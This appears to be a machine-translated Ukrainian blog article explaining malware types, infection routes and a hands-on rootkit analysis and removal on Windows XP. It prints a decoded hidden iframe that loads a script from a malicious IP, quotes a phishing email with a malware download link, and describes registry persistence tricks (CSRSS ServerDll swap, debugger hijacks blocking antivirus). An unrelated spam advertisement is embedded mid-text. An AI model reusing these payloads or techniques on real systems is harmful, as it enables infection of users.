Що таке розмноження комп'ютерних вірусів? Звірина моє

І знову здрастуйте.
Тема сьогоднішньої статті. Види комп'ютерних вірусів, принципи роботи, шляхи зараження комп'ютерними вірусами.

Що таке комп'ютерні віруси.

Комп'ютерний вірус — це спеціально написана програма або складання алгоритмів, які пишуться з метою: пожартувати, нашкодити чиєму комп'ютеру, отримання доступу до вашого комп'ютера, для перехоплення паролів або вимагання грошей. Віруси можуть самокопіюватися і заражати шкідливим кодом ваші програми та файли, а також завантажувальні сектори.

Види шкідливих програм.

Розділити шкідливі програми можна на два основні види.
Віруси та черв'яки.

Віруси- розповсюджуються через шкідливий файл, який ви могли завантажити в інтернеті, або може опинитися на піратському диску, або часто передають їх по скайпу під виглядом корисних програм (зауважив, що на останнє часто трапляються школярі, їм передають нібито мод для гри чи чіти справі може виявитися вірусом, який може нашкодити).
Вірус вносить свій код одну з програм, або маскується окремою програмою там куди зазвичай користувачі не заходять (папки з операційною системою, приховані системні папки).
Вірус не може запуститися сам, поки ви не запустите заражену програму.
Черв'якизаражають вже безліч файлів на вашому комп'ютері, наприклад, всі exe файли, системні файли, завантажувальні сектори і тд.
Хробаки найчастіше проникають у систему вже самі, використовуючи вразливість вашої ОС, вашого браузера, певної програми.
Вони можуть проникати через чати, програми для спілкування, такі як skype, icq, можуть поширюватися через електронну пошту.
Також вони можуть бути на сайтах, і використовуючи вразливість вашого браузера проникнути у вашу систему.
Черв'яки можуть розповсюджуватися локальною мережею, якщо один з комп'ютерів в мережі виявиться заражений він може поширюватися на інші комп'ютери заражаючи всі файли на своєму шляху.
Хробаки намагаються писати під найпопулярніші програми. Наприклад зараз найпопулярніший браузер «Chrome», тому шахраї намагатимуться писати під нього, і робитимуть шкідливий код на сайти під нього. Тому що часто цікавіше заразити тисячі користувачів, які використовують популярну програму, ніж сотню з непопулярною програмою. Хоча chrome і постійно покращує захист.
Кращий захист від мережевих черв.й це оновлювати ваші програми та вашу операційну систему. Багато хто нехтує оновленнями, про що часто шкодують.
Кілька років тому я помічав наступний хробак.

Але він явно потрапив не через інтернет, а швидше за все через піратський диск. Суть його роботи була такою - він створював нібито копію кожної папки на комп'ютері або на флешці. Але насправді він створював не схожу папку, а exe файл. При натисканні на такий exe файл він поширювався ще сильнішим за системою. І ось було тільки позбавишся його, прийдеш до друга з флешкою, скинути в нього музику, а повертаєшся із зараженою таким хробаком флешку і знову доводилося його виводити. Чи завдавав цей вірус якоїсь шкоди системі я не знаю, але незабаром цей вірус припинив своє існування.

Основні різновиди вірусів.

Насправді існує безліч видів та різновидів комп'ютерних загроз. І все розглянути просто неможливо. Тому ми розглянемо найпоширеніші останнім часом і найнеприємніші.
Віруси бувають:
— Файлові— перебувають у зараженому файлі, активуються коли користувач включає цю програму, не можуть активуватися.
— Завантажувальні— можуть завантажуватися при завантаженні windows, потрапивши в автозавантаження, при вставці флешки або подібне.
- Макро віруси - це різні скрипти, які можуть перебувати на сайті, можуть надіслати їх вам поштою або в документах Word і Excel, виконують певні функції закладені в комп'ютері. Використовують вразливість ваших програм.

Типи вірусів.
-Троянські програми
- Шпигуни
- Здирники
- Вандали
- Руткіти
- Botnet
- Кейлогери
Це найголовніші види загроз, які можуть вам зустрітися. Але насправді їх набагато більше.
Деякі віруси можуть навіть комбінуватися й утримувати у собі кілька видів цих загроз.
- Троянські програми. Назва походить від троянського коня. Проникає у ваш комп'ютер під виглядом нешкідливих програм, потім може відкрити доступ до комп'ютера або переслати ваші паролі господарю.
Останнім часом поширені такі трояни, які називаються стилери (stealer). Вони можуть красти збережені паролі у вашому браузері, у поштових ігрових клієнтах. Відразу після запуску копіює ваші паролі та відправляє ваші паролі на email або на хостинг зловмиснику. Йому залишається зібрати ваші дані, потім їх або продають або використовують у своїх цілях.
- Шпигуни (spyware)відстежують дії користувача. Які сайти відвідує або що робить користувач на комп'ютері.
- Здирники. До них відносяться вінлокери (winlocker). Програма повністю або повністю блокує доступ до комп'ютера і вимагає гроші за розблокування, наприклад покласти на рахунок або тд. У жодному разі якщо ви потрапили на таке не варто пересилати гроші. Комп'ютер вам не розблокується, а гроші ви втратите. Вам пряма дорога на сайт компанії Drweb, там можна знайти як розблокувати багато гвинлок, за рахунок введення певного коду або виконання деяких дій. Деякі вінлокери можуть зникнути, наприклад, через день.
- Вандалиможуть блокувати доступи до сайтів антивірусів та доступ до антивірусів та багатьох інших програм.
- Руткіти(Rootkit) - віруси гібриди. Можуть містити різні віруси. Можуть отримувати доступ до вашого комп'ютера, і людина буде повністю мати доступ до вашого комп'ютера, причому можуть злитися на рівень ядра вашої ОС. Прийшли зі світу Unix систем. Можуть маскувати різні віруси, збирати дані про комп'ютер та всі процеси комп'ютера.
- Botnetдосить неприємна річ. Ботнети це величезні мережі із заражених комп'ютерів «зомбі», які можуть використовуватися для ддоса сайтів та інших кібер атак, використовуючи заражені комп'ютери. Цей вид дуже поширений і важко виявити, навіть антивірусні компанії можуть довго не знати про їх існування. Дуже багато хто може бути ними заражений і навіть не підозрювати про це. Не виключення ви і навіть може і я.
— Кейлогери(keylogger) – клавіатурні шпигуни. Перехоплюють все, що ви вводите з клавіатури (сайти, паролі) і відправляє їх господарю.

Шляхи зараження комп'ютерними вірусами.

Основні шляхи зараження.
- Вразливість операційної системи.

— Вразливість у браузері

- Якість антивірусу кульгає

- Глупість користувача

- Змінні носії.
Вразливість ОС— як би не намагалися клепати захист для ОС, згодом знаходяться дірки безпеки. Більшість вірусів пишеться під windows, оскільки це найпопулярніша операційна система. Найкращий захист це постійно оновлювати вашу операційну систему і намагатися використовувати новішу версію.
Браузери— Тут відбувається за рахунок уразливостей браузерів, особливо якщо вони знову ж таки старі. Лікується також частим оновленням. Так само можуть бути проблеми, якщо ви качаєте плагіни для браузера з сторонніх ресурсів.
Антивіруси— безкоштовні антивіруси, які мають менший функціонал на відміну від платних. Хоча і платні не дають 100 результатів у захисті і дають осічки. Але бажано мати все ж таки хоча б безкоштовний антивірус. Я вже писав про безкоштовні антивіруси у цій статті.
Глупість користувача- кліки по банерах, переходи за підозрілими посиланнями з листів і т.д., встановлення софту з підозрілих місць.
Змінні носії— віруси можуть встановлюватися автоматично із заражених та спеціально підготовлених флешок та інших змінних носіїв. Нещодавно світ почув про вразливість BadUSB.

https://avi1.ru/ - купити дуже недороге просування у соціальних мережах Ви можете на цьому сайті. Також Ви отримаєте справді вигідні пропозиції щодо придбання ресурсів на свої сторінки.

Види об'єктів, що заражаються.

Файли— Заражають ваші програми, системні та звичайні файли.
Завантажувальні сектори- резидентні віруси. Заражають як відомо з назви завантажувальні сектори комп'ютера, приписують свій код автозавантаження комп'ютера і запускаються під час запуску операційній системі. Часом добре маскуються, що важко прибрати з автозавантаження.
Макрокоманди— Документи word, excel та подібні. Використовуючи макроси та вразливості засобів Microsoft office, вносить свій шкідливий код у вашу операційну систему.

Ознаки зараження комп'ютерними вірусами.

Не факт, що з появою деяких із цих ознак означає наявність вірусу в системі. Але якщо вони рекомендується перевірити свій комп'ютер антивірусом або звернутися до фахівця.
Одна з найпоширеніших ознак - це сильне навантаження комп'ютера. Коли у вас повільно працює комп'ютер, хоча у вас нічого нібито не включено, програм, які можуть сильно навантажувати комп'ютер. Але якщо у вас антивірус зауважте антивіруси самі по собі навантажують комп'ютер дуже добре. А у разі відсутності такого софту, який може вантажити, то швидше тут віруси. Взагалі раджу зменшити для початку кількість програм, що запускаються в автозапуску.

так само може бути однією з ознак зараження.
Але не всі віруси можуть сильно завантажувати систему, деякі практично важко помітити зміни.
Системні помилки.Перестають працювати драйвера, деякі програми починають працювати неправильно або часто вилітають з помилкою, але раніше припустимо такого не помічалося. Або починають часто перезавантажуватись програми. Звичайно таке буває з-за антивірусів, наприклад антивірус видалив помилково порахувавши системний файл шкідливим, або видалив дійсно заражений файл але він був пов'язаний із системними файлами програми і видалення спричинило такі помилки.

Поява реклами у браузерахабо навіть на робочому столі починають з'являтись банери.
Поява нестандартних звуківпри роботі комп'ютера (писк, клацання ні з того ні з сього тощо).
Відкривається сам собою CD/DVD привід, або просто починає ніби читати диск, хоча диска там немає.
Тривале увімкнення або вимкнення комп'ютера.
Викрадення ваших паролів.Якщо ви помітили що від вашого імені розсилається різний спам, з вашої поштової скриньки або сторінки соціальної мережі, як ймовірність, що вірус проник у ваш комп'ютер і передав паролі господарю, якщо ви помітили таку рекомендую перевіритись антивірусом в обов'язковому порядку (хоча не факт що саме так зловмисник отримав ваш пароль).
Часте звернення до жорсткого диска. Кожен комп'ютер має індикатор, який блимає, коли використовують різні програми або коли копіюєте, завантажуєте, переміщаєте файли. Наприклад у вас просто включений комп'ютер але не використовується жодних програм, але індикатор починає часто блимати нібито використовувані програми. Це вже віруси лише на рівні жорсткого диска.

Ось власне і розглянули комп'ютерні віруси, які можуть вам зустрітися в інтернеті. Але насправді їх у рази більше, і повністю захиститися неможливо, хіба що не користуватися інтернетом, не купувати диски і взагалі не включати комп'ютер.

Що робити, якщо антивірус не впорався зі своєю роботою.

    Ви, мабуть, неодноразово зустрічали інформацію у ЗМІ про те, що з'явився новий страшний вірус, який може призвести до нової страшної епідемії та мало не до кінця Інтернету. Або, що з'явилася нова технологія вірусу, заснована на використанні молодших бітів пікселів графічних зображень, і тіло вірусу практично неможливо виявити. Або... багато чого страшного. Іноді віруси наділяють мало не розумом та самосвідомістю. Відбувається це від того, що багато користувачів, заплутавшись у складній класифікації та подробицях механізму функціонування вірусів, забувають, що, будь-який вірус - це комп'ютерна програма, тобто. набір процесорних команд (інструкцій), оформлених певним чином. Неважливо, в якому вигляді існує цей набір (файл, скрипт, частина завантажувального сектора або групи секторів поза файловою системою) - набагато важливіше, щоб ця програма не змогла отримати управління, тобто. почати виконуватись. Записаний на ваш жорсткий диск, але вірус, що не запустився, також необразливий, як і будь-який інший файл. Головне завдання у боротьбі з вірусами – не виявити тіло вірусу, а запобігти можливості його запуску. Тому грамотні виробники вірусів постійно вдосконалюють як технології занесення шкідливого програмного забезпечення в систему, а й способи потайного запуску і функціонування.

Як зараження комп'ютера шкідливим програмним забезпеченням (вірусом)? Відповідь очевидна - має бути запущена якась програма. Ідеально – з адміністративними правами, бажано – без відома користувача та непомітно для нього. Способи запуску постійно вдосконалюються та засновані, не тільки на прямому обмані, але й на особливостях чи недоліках операційної системи чи прикладного програмного забезпечення. Наприклад, використання можливості автозапуску для змінних носіїв серед операційних систем сімейства Windows призвело до поширення вірусів на флеш-дисках. Функції автозапуску зазвичай викликаються зі змінного носія або із спільних папок мережі. При автозапуску обробляється файл Autorun.inf. Цей файл визначає, які команди виконує система. Багато компаній використовують цю функцію для запуску інсталяторів своїх програмних продуктів, однак її ж стали використовувати і виробники вірусів. В результаті, про автозапуск, як деяку зручність при роботі за комп'ютером, можна забути. - більшість грамотних користувачів цю опцію відключили назавжди.

Для відключення функцій автозапуску у Windows XP/2000 reg-файл для імпорту до Реєстру.

Для Windows 7 і пізніших вимкнення автозапуску можна виконати за допомогою аплета "Автозапуск" панелі керування. У цьому випадку відключення діє по відношенню до поточного користувача. Більш надійним способом захисту від застосування вірусів, що переносяться на знімних пристроях, є блокування автозапуску для всіх користувачів за допомогою групових політик:

запустити редактор групових політик gpedit.msc

перейти до "Конфігурація комп'ютера" - - "Конфігурація Windows" - "Адміністративні шаблони" - "Компоненти Windows" - "Політика автозапуску".

встановити значення "Увімк." для компонента "Вимкнути автозапуск"

    Але основним "постачальником" вірусів, безсумнівно, є Інтернет і як основне прикладне програмне забезпечення - "Обозреватель Інтернету" (браузер). Сайти стають все складнішими і красивішими, з'являються нові мультимедійні можливості, зростають соціальні мережі, постійно збільшується кількість серверів і зростає кількість їх відвідувачів. Оглядач Інтернету поступово перетворюється на складний програмний комплекс – інтерпретатор даних, отриманих ззовні. Іншими словами, - до програмного комплексу, який виконує програми на підставі невідомого вмісту. Розробники оглядачів (браузерів) постійно працюють над підвищенням безпеки своїх продуктів, проте виробники вірусів теж не стоять на місці, і ймовірність зараження системи шкідливим програмним забезпеченням залишається досить високою. Існує думка, що якщо не відвідувати сайти для дорослих, сайти з серійними номерами програмних продуктів і т.п. то можна уникнути зараження. Це не зовсім так. В Інтернеті чимало зламаних сайтів, власники яких навіть не підозрюють про зло. І давно минули ті часи, коли зломщики тішили своє самолюбство заміною сторінок (дефейсом). Зараз подібний злом зазвичай супроводжується впровадженням у сторінки цілком добропорядного сайту, спеціального коду для зараження комп'ютера відвідувача. Крім того, виробники вірусів використовують найпопулярніші пошукові запити для відображення заражених сторінок у результатах видачі пошукових систем. Особливо популярні запити з фразами "завантажити безкоштовно" та "завантажити без реєстрації та SMS". Намагайтеся не використовувати ці слова в пошукових запитах, інакше ризик отримання посилання на шкідливі сайти значно зростає. Особливо якщо ви шукаєте популярний фільм, який ще не вийшов у прокат або останній концерт найвідомішої групи.

    Механізм зараження комп'ютера відвідувача сайту в спрощеному вигляді я спробую пояснити на прикладі. Не так давно, при відвідуванні одного досить популярного сайту, я отримав повідомлення програми моніторингу автозапуску (PT Startup Monitor) про те, що додаток rsvc.exeнамагається виконати запис до Реєстру. Програма була благополучно прибита FAR"ом, а зміни в реєстрі скасовані PT Startup Monitor"ом. Аналіз сторінок сайту показав наявність дивного коду мовою Javascript, що виконує операції з перетворення рядкових даних, які не є осмисленим текстом. Мова Javascript підтримується більшістю сучасних браузерів та використовується практично на всіх веб-сторінках. Сценарій, що завантажується з таких сторінок, виконується браузером Інтернету. Внаслідок численних перетворень згаданих вище рядків виходив досить простий код:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

Що означає виконання CGI-сценарію сервера з IP-адресою 91.142.64.91 (що не має жодного відношення до відвідуваного сайту) в окремому вікні (тег iframe) розміром 1 піксель за шириною та 1 піксель за висотою, у невидимому вікні. Результат – цілком ймовірне вірусне зараження. Особливо якщо немає антивірусу або він не зреагує на загрозу. Даний приклад прихованого перенаправлення відвідувача на шкідливий сайт з використанням тега "iframe" сьогодні, напевно, не дуже актуальний, але цілком демонструє як, відвідуючи легальний сайт, можна непомітно для себе побувати і на іншому, не дуже легальному, навіть не підозрюючи про це. На жаль, абсолютної гарантії від вірусного зараження немає і потрібно бути готовим до того, що з вірусом доведеться справлятися власними силами.

    Останнім часом, одним з основних напрямків розвитку шкідливих програм стало застосування в них усіляких способів захисту від виявлення антивірусними засобами – так звані руткіти (rootkit) – технології. Такі програми часто або виявляються антивірусами або не видаляються ними. У цій статті я спробую описати більш-менш універсальну методику виявлення та видалення шкідливого програмного забезпечення із зараженої системи.

    Видалення "якісного" вірусу стає все більш нетривіальним завданням, оскільки такий вірус розробники забезпечують властивостями, що максимально ускладнюють її вирішення. Нерідко вірус може працювати в режимі ядра (kernel mode) та має необмежені можливості щодо перехоплення та модифікації системних функцій. Іншими словами - вірус може приховати від користувача (і антивірусу) свої файли, ключі реєстру, мережеві з'єднання - все, що може бути ознакою його наявності в зараженій системі. Він може обійти будь-який брандмауер, системи виявлення вторгнення та аналізатори протоколів. І, крім іншого, він може працювати і в безпечному режимі завантаження Windows. Іншими словами, сучасну шкідливу програму дуже непросто виявити та знешкодити.

Розвиток антивірусів теж не стоїть на місці, - вони постійно вдосконалюються, і в більшості випадків, зможуть виявити і знешкодити шкідливе ПЗ, але рано чи пізно, знайдеться модифікація вірусу, яка якийсь час буде "не по зубах" будь-якому антивірусу. Тому самостійне виявлення та видалення вірусу - це робота, яку рано чи пізно доведеться виконувати будь-якому користувачеві комп'ютера.

Добрий день.
Нас зацікавила ваша кандидатура, але пропонуємо вам заповнити
наш фірмовий бланк резюме та надіслати його за адресою [email protected]
Відповідь не гарантується, але якщо Ваше резюме нас зацікавить, ми
зателефонуємо Вам протягом кількох днів. Не забудьте
вказати телефон, а також позицію, на яку Ви претендуєте. Бажано
також вказати побажання щодо окладу.
Наш фірмовий бланк ви можете завантажити за посиланням нижче.
http://verano-konwektor.pl/resume.exe

    Аналіз заголовків листа показав, що його було відправлено з комп'ютера до Бразилії через сервер, що у США. А фірмовий бланк пропонується завантажити із сервера у Польщі. І це з російськомовним змістом.

nbsp   Ясна річ, що ніякого фірмового бланка ви не побачите, і швидше за все, отримаєте троянську програму на свій комп'ютер.
    Завантажую файл resume.exe. Розмір – 159744 байта. Поки що не запускаю.
    Копіюю файл на інші комп'ютери, де встановлені різні антивіруси - просто для чергової перевірки їх ефективності. Результати не дуже - антивірус Avast 4.8 Home Edition делікатно промовчав. Підсунув його Symantec" - та ж реакція. Спрацював тільки AVG 7.5 Free Edition. Схоже, цей антивірус, насправді, не дарма набирає популярності.
    Усі експерименти виконую на віртуальній машині з операційною системою Windows XP. Обліковий запис з правами адміністратора, оскільки найчастіше віруси успішно впроваджуються в систему лише, якщо користувач є локальним адміністратором.
    Запускаю. Через якийсь час заражений файл зник, схоже, вірус розпочав свою чорну справу.
    Поведінка системи зовні не змінилася. Очевидно, потрібне перезавантаження. Про всяк випадок, забороняю в брандмауері з'єднання протоколу TCP. Залишаю дозволеними тільки вихідні з'єднання по UDP:53 (DNS) - треба залишити вірусу хоч якусь можливість проявити свою активність. Як правило, після впровадження вірус повинен зв'язатися з господарем або із заданим сервером в інтернеті, ознакою чого будуть DNS-запити. Хоча, знову ж таки, у світлі сказаного вище, розумний вірус може їх замаскувати, крім того, він може обійти брандмауер. Забігаючи вперед, скажу, що в даному конкретному випадку цього не сталося, але для надійного аналізу мережної активності весь трафік зараженої машини краще пустити через іншу, незаражену, де можна бути впевненим, що правила брандмауера виконуються, а аналізатор трафіку (я користувався Wireshark" ) видає те, що є насправді.
    Перезавантажуюсь. Зовні нічого не змінилося, окрім того, що неможливо вийти в інтернет, оскільки я сам відключив таку можливість. Ні в шляхах автозапуску, ні в службах, ні в системних каталогах нічого нового. Перегляд системного журналу дає лише одне наведення - системі не вдалося запустити таємничу службу grande48. Такої служби в мене бути не могло, та й за часом ця подія збіглася з моментом застосування. Що ще наводить на думку про успішне впровадження - так це відсутність у реєстрі запису про службу grande48 і відсутність другого повідомлення в журналі системи про помилку запуску служби після перезавантаження. Це, швидше за все, деякий недоопрацювання вірусописувачів. Хоча й несуттєва, адже більшість користувачів журнал подій не переглядають, та й на момент виникнення підозри на зараження цей запис у журналі вже може бути відсутнім.

Визначаємо наявність вірусу у системі.

1.     Напевно має бути "лівий" трафік. Визначити можна з допомогою аналізаторів протоколу. Я використав Wireshark. Відразу після завантаження першим запускаю його. Все правильно, є наявність групи DNS-запитів (як потім виявилось – один раз за 5 хвилин) на визначення IP-адрес вузлів ysiqiyp.com, irgfqfyu.com, updpqpqr.com тощо. Взагалі всі ОС Windows люблять виходити в мережу, коли треба і не треба, антивіруси можуть оновлювати свої бази, тому визначити приналежність трафіку саме вірусу досить важко. Зазвичай потрібно пропустити трафік через незаражену машину та серйозно проаналізувати його вміст. Але це окрема тема. В принципі, непрямою ознакою ненормальності мережної активності системи можуть бути значні значення лічильників трафіку провайдера, в умовах простою системи, лічильники з властивостей VPN-з'єднання тощо.

2.     Спробуємо використовувати програми для пошуку руткітів. Наразі таких програм вже чимало і їх нескладно знайти у мережі. Одна з найпопулярніших - Марка Руссиновича, яку можна завантажити на сторінці розділу Windows Sysinternals сайту Microsoft. Інсталяція не потрібна. Розархівуємо та запускаємо. Тиснемо "Scan". Після нетривалого сканування бачимо результати:

    До речі, навіть не вникаючи у зміст рядків, можна відразу помітити, що є дуже "свіжі" за часом створення/модифікації запису або файли (колонка "Timestamp"). Нас насамперед мають зацікавити файли з описом (колонка "Description") - "Hidden from Windows API"- приховано від API-інтерфейсу Windows. Приховування файлів, записів у реєстрі, додатків – це, звичайно, ненормально. Два файли - grande48.sys і Yoy46.sys - це саме те, що ми шукаємо. Це і є шуканий руткіт, що прописався під виглядом драйверів, або його частина, що забезпечує скритність. Наявність у списку решти була для мене сюрпризом. Перевірка показала – це нормальні драйвери Windows XP. Крім того, вірус приховував їх наявність лише у папці \system32 , а їх копії в \system32\dllcache залишилися видимими.
    Нагадаю, що у Windows XP застосовується спеціальний механізм захисту системних файлів, званий Windows File Protection (WFP). Завдання WFP - автоматичне відновлення важливих системних файлів при їх видаленні або заміні застарілими або непідписаними копіями. Усі системні файли Windows XP мають цифровий підпис і перераховані у спеціальній базі даних, що використовується WFP. Для збереження копій файлів використовується папка \system32\dllcache і, частково, \Windows\driver cache . При видаленні або заміні одного із системних файлів, WFP автоматично копіює "правильну" його копію з папки \dllcache. Якщо вказаний файл відсутній у папці \dllcache , Windows XP просить вставити в привід компакт-дисків інсталяційний компакт-диск Windows XP. Спробуйте видалити vga.sys із \system32, і система відразу його відновить, використовуючи копію з dllcache. А ситуація, коли, при працюючій системі відновлення файлів, файл драйвера є в \dllcache і його не видно в \system32 - це теж додаткова ознака наявності руткіта в системі.

Видаляємо вірус із системи.

    Залишилося виконати найважливішу дію – видалити вірус. Найпростіший і надійніший спосіб - завантажитися в іншій, незараженій операційній системі та заборонити старт драйверів руткіту.

Скористайтеся стандартною консоллю відновлення Windows. Беремо інсталяційний диск Windows XP і завантажуємося з нього. На першому екрані вибираємо 2-й пункт меню – тиснемо R.

Вибираємо систему (якщо їх кілька):

Вводимо пароль адміністратора.
Список драйверів та служб можна переглянути за допомогою команди listsvc:

Справді, у списку є Yoy46 , правда відсутня grande48, що говорить про те, що файл драйвера grande48.sys присутня в системі, але не завантажується:

Консоль відновлення дозволяє забороняти або дозволяти запуск драйверів та служб за допомогою команд disableі enable. Забороняємо старт Yoy46 командою:

    Водимо команду EXIT і система йде на перезавантаження.
Після перезавантаження драйвер руткіта не буде завантажено, що дозволить легко видалити його файли та очистити реєстр від його записів. Можна зробити це вручну, а можна використовувати якийсь антивірус. Найбільш ефективним, на мою думку, буде безкоштовний сканер на основі всім відомого антивірусу Dr.Web Ігоря Данилова. Завантажити можна звідси - http://freedrweb.ru
    Там же можна завантажити "Dr.Web LiveCD" - образ диска, який дозволяє відновити працездатність системи, ураженої діями вірусів, на робочих станціях та серверах під керуванням Windows\Unix, скопіювати важливу інформацію на змінні носії або інший комп'ютер, якщо дії шкідливих програм унеможливили завантаження комп'ютера. Dr.Web LiveCD допоможе не тільки очистити комп'ютер від інфікованих та підозрілих файлів, але й спробує вилікувати заражені об'єкти. Для видалення вірусу потрібно завантажити з сайту DrWeb образ (файл із розширенням.iso) та записати його на CD. Буде створено завантажувальний диск, завантажившись з якого, керуєтеся простим та зрозумілим меню.

    Якщо з будь-яких причин немає можливості скористатися Dr.Web LiveCD, можна спробувати антивірусний сканер Dr.Web CureIt!, який можна запустити, завантажившись в іншій ОС, наприклад, з використанням Winternals ERD Commander. Для сканування зараженої системи необхідно вказати саме жорсткий диск (Режим "Вибіркова перевірка"). Сканер допоможе вам знайти файли вірусу, і залишиться лише видалити пов'язані з ним записи з реєстру.
    Оскільки віруси навчилися прописуватися на запуск у безпечному режимі завантаження, не заважає перевірити гілку реєстру:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Розділи:
Minimal- список драйверів та служб, що запускаються в безпечному режимі (Safe Mode)
Network- те саме, але з підтримкою мережі.

Додам, що існує новий клас rootkit, представником якого є BackDoor.MaosBoot, що з'явився наприкінці 2007р. Ця троянська програма прописує себе в завантажувальний сектор жорсткого диска та забезпечує приховане встановлення свого драйвера в пам'яті. Сам Rootkit-драйвер прямо записаний в останні сектори фізичного диска, минаючи файлову систему, чим і приховує свою присутність на диску. Загалом принцип не новий, років десять тому шкідливі програми подібним чином маскувались на резервних доріжках дискет і жорстких дисків, проте виявився дуже ефективним, оскільки більшість антивірусів із завданням видалення BackDoor.MaosBoot досі не справляються. Згадуваний вище завантажувальний сектор не перевіряє, а сектори наприкінці диска для нього ніяк не пов'язані з файловою системою і, звичайно, такий руткіт він не виявить. Правда, Dr.Web (а, отже, і Cureit) із BackDoor.MaosBoot цілком справляється.

    Якщо у вас виникли сумніви щодо будь-якого файлу, то можна скористатися безкоштовною онлайновою антивірусною службою virustotal.com. Через спеціальну форму на головній сторінці сайту закачуєте підозрілий файл і чекаєте на результати. Сервісом virustotal використовуються консольні версії безлічі антивірусів для перевірки вашого підозрюваного файлу. Результати відображаються на екрані. Якщо файл є шкідливим, то з великою ймовірністю, ви зможете це визначити. Певною мірою сервіс можна використовувати для вибору "кращого антивірусу".
посилання на одну з гілок форуму сайту virusinfo.info, де користувачі викладають посилання на різні ресурси, присвячені антивірусному захисту, в т.ч. та онлайн - перевірок комп'ютера, браузера, файлів...

    Іноді в результаті некоректних дій вірусу (або антивірусу) система взагалі перестає завантажуватися. Наведу характерний приклад. Шкідливі програми намагаються впровадитися у систему, використовуючи різні, зокрема, досить незвичайні методи. У процесі початкового завантаження, ще до реєстрації користувача, запускається "Диспетчер сеансів" (SystemRootSystem32smss.exe) , завдання якого - запустити високорівневі підсистеми і сервіси (служби) операційної системи. На цьому етапі запускаються процеси CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), і служби, що залишилися з параметром Start=2 з розділу реєстру

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

    Інформація, призначена для диспетчера сеансів, знаходиться у ключі реєстру

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

Одним із способів впровадження в систему є заміна dll-файлу для CSRSS. Якщо ви подивитеся вміст запису

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

То знайдете значення

ServerDll=basesrv, ServerDll=winsrv. Бібліотеки basesrv.dll та winsrv.dll - це "правильні" файли системи, що завантажуються службою CSRSS на звичайній (незараженій) системі. Цей запис у реєстрі можна підправити на запис, який забезпечує завантаження, наприклад, замість basesrv.dll, шкідливий basepvllk32.dll:

ServerDll=basepvllk32 (або будь-яку іншу dll, відмінну від basesrv і winsrv)

Що забезпечить при наступному перезавантаженні отримання управління шкідливою програмою. Якщо ж ваш антивірус виявить і видалить впроваджену basepvllk32, залишивши недоторканий запис у реєстрі, то завантаження системи завершиться "синім екраном смерті" (BSOD) з помилкою STOP c000135 та повідомленням про неможливість завантажити basepvllk32.

Виправити ситуацію можна так:

Завантажиться в консоль відновлення (або в будь-якій іншій системі), і скопіювати файл basesrv.dll з папки C:WINDOWS\system32 в ту ж папку під ім'ям basepvllk32.dll. Після цього система завантажиться і можна буде вручну підправити запис у реєстрі.
- завантажитись з використанням Winternals ERD Commander та виправити запис у реєстрі на ServerDll=basesrv. Або виконати відкат системи за допомогою точки відновлення.

    Ще один характерний приклад. Шкідлива програма реєструється як налагоджувач процесу explorer.exe, створюючи в реєстрі запис типу:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Вилучення wuauclt.exe антивірусом без видалення запису в реєстрі призводить до неможливості запуску explorer.exe. В результаті ви отримуєте порожній робочий стіл, без будь-яких кнопок та ярликів. Вийти з положення можна за допомогою комбінації клавіш CTRL-ALT-DEL. Вибираєте "Диспетчер задач" - "Нове завдання" - "Огляд" - знаходьте та запускаєте редактор реєстру regedit.exe. Потім видаляєте ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
та перезавантажуєтесь.

    У випадку, коли ви точно знаєте час зараження системи, відкат на точку відновлення до цієї події є досить надійним способом позбавлення від зарази. Іноді є сенс виконувати не повний відкат, а частковий з відновленням файлу реєстру SYSTEM, як це описано в статті "Проблеми із завантаженням ОС" розділу "Windows"

    == Травень 2008. ==

Доповнення

    Цей додаток виник через рік після написання основної статті. Тут я вирішив розмістити найцікавіші рішення, що виникли у процесі боротьби зі шкідливим програмним забезпеченням. Щось на кшталт коротких нотаток.

Після видалення вірусу жоден антивірус не працює.

    Випадок цікавий тим, що спосіб блокування антивірусного програмного забезпечення можна використовувати і в боротьбі з файлами вірусів, що виконуються. Почалося все з того, що після вилучення досить примітивного вірусу не запрацював ліцензійний "Стрім Антивірус". Переустановки з чищенням реєстру не допомогли. Спроба встановлення Avira Antivir Personal Free закінчилася успішно, але антивірус не запустився. У системному журналі було повідомлення про таймаут під час запуску служби "Avira Antivir Guard". Перезапуск вручну закінчувався тією самою помилкою. Причому жодних зайвих процесів у системі не виконувалося. Була стовідсоткова впевненість – вірусів, руткітів та іншої гидоти (Malware) у системі немає.
    У якийсь момент спробував запустити антивірусну утиліту AVZ. Принцип роботи AVZ багато в чому заснований на пошуку в системі різноманітних аномалій, що вивчається. З одного боку, це допомагає в пошуку Malware, але з іншого цілком закономірні підозри до компонентів антивірусів, антишпигунів та іншого легітимного ПЗ, що активно взаємодіє із системою. Для придушення реагування AVZ на легітимні об'єкти та спрощення аналізу результатів перевірки системи за рахунок позначки легітимних об'єктів кольором та їх фільтрації з логів застосовується база безпечних файлів AVZ. З недавнього часу запущено повністю автоматичний сервіс, що дозволяє всім бажаючим надіслати файли для поповнення цієї бази.
Але: виконуваний файл avz.exe не запустився! Перейменовую avz.exe в musor.exe - все чудово запускається. В черговий раз AVZ виявився незамінним помічником у вирішенні проблеми. При виконанні перевірок у результатах з'явились рядки:

Небезпечно - налагоджувач процесу "avz.exe"="ntsd-d"
Небезпечно - налагоджувач процесу "avguard.exe"="ntsd-d"
:.

То була вже серйозна зачіпка. Пошук у реєстрі за контекстом "avz" призвів до виявлення у гілці

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Розділу з ім'ям avz.exe, що містить рядковий параметр з ім'ям "Debugger"та значенням .
І, як з'ясувалося пізніше, у зазначеній гілці був присутній не тільки розділ "avz.exe", але й розділи з іменами модулів, що виконуються практично всіх відомих антивірусів і деяких утиліт моніторингу системи. Сам ntsd.exe - цілком легальний налагоджувач Windows, стандартно присутній у всіх версіях ОС, але подібний запис у реєстрі призводить до неможливості запуску програми, ім'я файлу якого збігається з ім'ям розділу???.exe.

